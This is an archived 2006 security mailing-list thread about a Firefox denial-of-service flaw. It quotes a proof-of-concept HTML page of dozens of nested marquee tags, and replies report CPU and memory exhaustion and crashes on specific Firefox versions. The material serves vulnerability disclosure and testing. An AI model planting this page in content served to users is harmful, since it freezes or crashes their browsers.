-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I was able to use this proof of concept code with the following results:
With Firefox 1.0.8 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Fedora/1.0.8-1.1.fc4 Firefox/1.0.8) I was able to cause a resource exhaustion with firefox increasing cpu cycles and memory allocation well beyond normal utilization but without crashing. With Firefox 1.5.0.3 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3) Firefox causes resource exhaustion to the point of crashing the application. Josh Zlatin-Amishav wrote: > On Tue, 30 May 2006, [EMAIL PROTECTED] wrote: > >> I have found a problem which causes denial of service on fire fox browser > > > Can you give us some more details, like versions and platforms affected? > I was unable to recreate this flaw using firefox 1.5.dfsg+1.5.0 on > Debian unstable. > > -- > - Josh > >> >> Creadit:to n00b for finding this bug.. >> >> the problem lie's in the >> >> <marquee> html tag uses 100% cpu and crash's the browser.. >> >> Following proof of concept available >> >> <html> >> <head> >> <title>Credit to n00b..</title> >> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> >> </head> >> >> <body> >> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></mar q >> > > ue > >> e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee> >> >> </body> >> </html> >> >> > > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.1 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iD8DBQFEffkxosz5/4IhOt4RAnmyAJ9a/TtfSGFlPW+wT/r6RyS3E57M3gCeIC4X /FsKrmn9RqJrINi0Z5PwvZA= =Wso3 -----END PGP SIGNATURE-----
